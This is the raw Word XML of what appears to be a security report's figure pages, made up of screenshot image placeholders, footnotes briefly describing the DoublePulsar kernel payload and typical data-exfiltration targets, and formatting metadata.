      <w:r w:rsidRPr="002627FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D3860EF" wp14:editId="28A8F467">
            <wp:extent cx="6465888" cy="5835535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259203" name="Picture 760259203"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03" name="Picture 760259203" descr="Graphical user interface, application, website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6483065" cy="5851037"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F39E0" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00B60421" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2C08E9" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135EB7E0" w14:textId="7C91F330" w:rsidR="00DF42B8" w:rsidRDefault="002627FD" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="426"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002627FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062B85AE" wp14:editId="454C4414">
            <wp:extent cx="6484325" cy="5742990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259208" name="Picture 760259208"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08" name="Picture 760259208" descr="Graphical user interface, website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId161"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6494229" cy="5751761"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0CF23" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D7457D" w14:textId="67F2AD8B" w:rsidR="00DF42B8" w:rsidRDefault="002627FD" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="709"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002627FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F8A9CD" wp14:editId="7E2057DE">
            <wp:extent cx="6733309" cy="6171392"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="760259209" name="Picture 76025920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09" name="Picture 760259209" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId162"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6753592" cy="6189982"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9182BD" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68513438" w14:textId="711F8CE0" w:rsidR="00DF42B8" w:rsidRDefault="002627FD" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002627FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="626C7059" wp14:editId="7CF09A7B">
            <wp:extent cx="6591992" cy="6312914"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259222" name="Picture 760259222"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22" name="Picture 760259222" descr="Graphical user interface, application, table, Excel&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6601912" cy="6322414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4D44F4" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455AFABD" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E52040B" w14:textId="2F2D78FA" w:rsidR="00DF42B8" w:rsidRDefault="002627FD" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="709"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002627FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E86D493" wp14:editId="0FACA705">
            <wp:extent cx="6733309" cy="5953765"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="760259247" name="Picture 76025924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47" name="Picture 760259247" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6750434" cy="5968907"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76AD6298" wp14:editId="376B0561">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="250" name="Rectangle 25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4E25272" id="Rectangle 25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3B71FC9A" w14:textId="1DFB8B5A" w:rsidR="00DF42B8" w:rsidRDefault="002627FD" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002627FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="561DBE15" wp14:editId="6033E5C7">
            <wp:extent cx="6667341" cy="5752407"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:docPr id="760259248" name="Picture 76025924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48" name="Picture 760259248" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6678445" cy="5761987"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF47B49" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242A631B" w14:textId="0CF53540" w:rsidR="00DF42B8" w:rsidRDefault="002627FD" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002627FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36087E2A" wp14:editId="307CFE62">
            <wp:extent cx="6567054" cy="5697746"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="760259249" name="Picture 76025924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49" name="Picture 760259249" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6584867" cy="5713201"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928D682" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EB9E894" w14:textId="5274F597" w:rsidR="00DF42B8" w:rsidRDefault="00401D23" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:right="-613" w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BFE9564" wp14:editId="389B5F6E">
            <wp:extent cx="6591992" cy="5704791"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259250" name="Picture 76025925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50" name="Picture 760259250" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6602932" cy="5714259"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C6E2D" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BB8A4B" w14:textId="1754046C" w:rsidR="00DF42B8" w:rsidRDefault="00401D23" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C156678" wp14:editId="0D3A59B6">
            <wp:extent cx="6396875" cy="5828884"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="760259251" name="Picture 76025925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51" name="Picture 760259251" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6403904" cy="5835288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B51FD5" w14:textId="24E19DF0" w:rsidR="00DF42B8" w:rsidRDefault="00401D23" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E74D035" wp14:editId="027BEF80">
            <wp:extent cx="6530404" cy="5635567"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="760259252" name="Picture 76025925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52" name="Picture 760259252" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6541120" cy="5644815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36931E3F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FC37FE" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E66868" w14:textId="4F1B0901" w:rsidR="00DF42B8" w:rsidRPr="008D7F6F" w:rsidRDefault="00401D23" w:rsidP="008D7F6F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:right="-613" w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA37873" wp14:editId="2E88D59D">
            <wp:extent cx="6497272" cy="5786928"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="760259253" name="Picture 76025925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59253" name="Picture 760259253" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6508456" cy="5796889"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DF42B8" w:rsidRPr="008D7F6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4174C" w14:textId="77777777" w:rsidR="00667FAE" w:rsidRDefault="00667FAE" w:rsidP="00314553">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A3FF7A0" w14:textId="77777777" w:rsidR="00667FAE" w:rsidRDefault="00667FAE" w:rsidP="003145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Open Sans">
    <w:altName w:val="Open Sans"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002EF" w:usb1="4000205B" w:usb2="00000028"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F1FD99" w14:textId="77777777" w:rsidR="00667FAE" w:rsidRDefault="00667FAE" w:rsidP="00314553">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0AE03C70" w14:textId="77777777" w:rsidR="00667FAE" w:rsidRDefault="00667FAE" w:rsidP="00314553">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w14:paraId="25DE82AA" w14:textId="44C40B4C" w:rsidR="00D81B90" w:rsidRDefault="00D81B90" w:rsidP="00C75431">
      <w:pPr>
        <w:pStyle w:val="FootnoteText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoublePulsar </w:t>
      </w:r>
      <w:r w:rsidR="00CC36C3">
        <w:t xml:space="preserve">is a multi-architecture (x86 and 64 bit) memory-based kernel payload that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">grants high levels of control over computer systems and runs in kernel mode. </w:t>
      </w:r>
      <w:r w:rsidR="00CC36C3">
        <w:t>It has four uses: respond to specific ping request (eg</w:t>
      </w:r>
      <w:r w:rsidR="00C75431">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CC36C3">
        <w:t xml:space="preserve"> heartbeat), uninstall itself, load shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00111097">
        <w:t xml:space="preserve"> or run Dynamic Link Library (DLL) on host</w:t>
      </w:r>
      <w:r w:rsidR="008A622B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1671375964"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[60]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00111097">
        <w:t>.</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w14:paraId="5FE11281" w14:textId="5BA5F422" w:rsidR="007F71A3" w:rsidRDefault="007F71A3" w:rsidP="007F71A3">
      <w:pPr>
        <w:pStyle w:val="FootnoteText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FootnoteReference"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> High value target of data exfiltration </w:t>
      </w:r>
      <w:r w:rsidR="0026247B">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> financial information, intellectual property, customer databases, username, passwords and other credentials, Social Security information, cryptographic keys, and proprietary software </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1213848948"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[61]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
  </w:footnote>
</w:footnotes>
</file>

<file path=word/intelligence2.xml><?xml version="1.0" encoding="utf-8"?>
<int2:intelligence xmlns:int2="http://schemas.microsoft.com/office/intelligence/2020/intelligence" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst">
  <int2:observations>
    <int2:textHash int2:hashCode="YUqhhjdGU3mxj4" int2:id="wYHvkVgK">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="92xWGSLcrHq9Bu" int2:id="B07rylRK">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="LRX8vzbgdI7+2n" int2:id="o3Ll3Aiw">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="DIY1TaOBvg8LUD" int2:id="KFhEQBev">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="9NanYSFPVrQiam" int2:id="8CNbNCet">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="ObXwqxYdK44Xpo" int2:id="EWu6WEI3">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="AG4yHWaQTwSohg" int2:id="QWAtOho8">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="jPAzReFghNcG7y" int2:id="mydIcM2v">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="r2ZufsRW2wPpRA" int2:id="nsNEXBKj">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="RmgKZl0ISEoohg" int2:id="rA12kOIU">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="2sJPEIyg8KVyzo" int2:id="nvuQY6bV">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:bookmark int2:bookmarkName="_Int_NjiCJWGk" int2:invalidationBookmarkName="" int2:hashCode="8zIFYd/BPTUAlB" int2:id="9Y796IUL"/>
    <int2:bookmark int2:bookmarkName="_Int_cpSBZqZb" int2:invalidationBookmarkName="" int2:hashCode="2nLKM9a+2Uy/mS" int2:id="6hPm2TWc">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Text_Critique"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_wJgFl5sC" int2:invalidationBookmarkName="" int2:hashCode="PP+Hh7LqQ7YUGl" int2:id="4oVH2Hhc">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Text_Critique"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_6wyAVesT" int2:invalidationBookmarkName="" int2:hashCode="bt2+LWihsseAYA" int2:id="SXUXb76g"/>
    <int2:bookmark int2:bookmarkName="_Int_xNK7iph8" int2:invalidationBookmarkName="" int2:hashCode="PZK2qOy0OxHBlW" int2:id="NqLwXAAG">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Text_Critique"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_7KDWIvAv" int2:invalidationBookmarkName="" int2:hashCode="TvFKKmHPk41dcA" int2:id="3N6JtzmS"/>
    <int2:bookmark int2:bookmarkName="_Int_0e6078sz" int2:invalidationBookmarkName="" int2:hashCode="ONcJGgPBgnuwmo" int2:id="lw65ifRl">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Text_Critique"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_769zeg8z" int2:invalidationBookmarkName="" int2:hashCode="yb0BQ0C8I9hwlr" int2:id="WskltP5C">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21E7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43E4D498"/>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0744714C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B868EB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A74C9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C08A43C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="42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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="105E18D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF462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A60CF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9800BF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7C16E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B83A28C4"/>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3F22CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A252B3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9370D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41C48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2"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2494B75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC4C8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4B07A1"/>
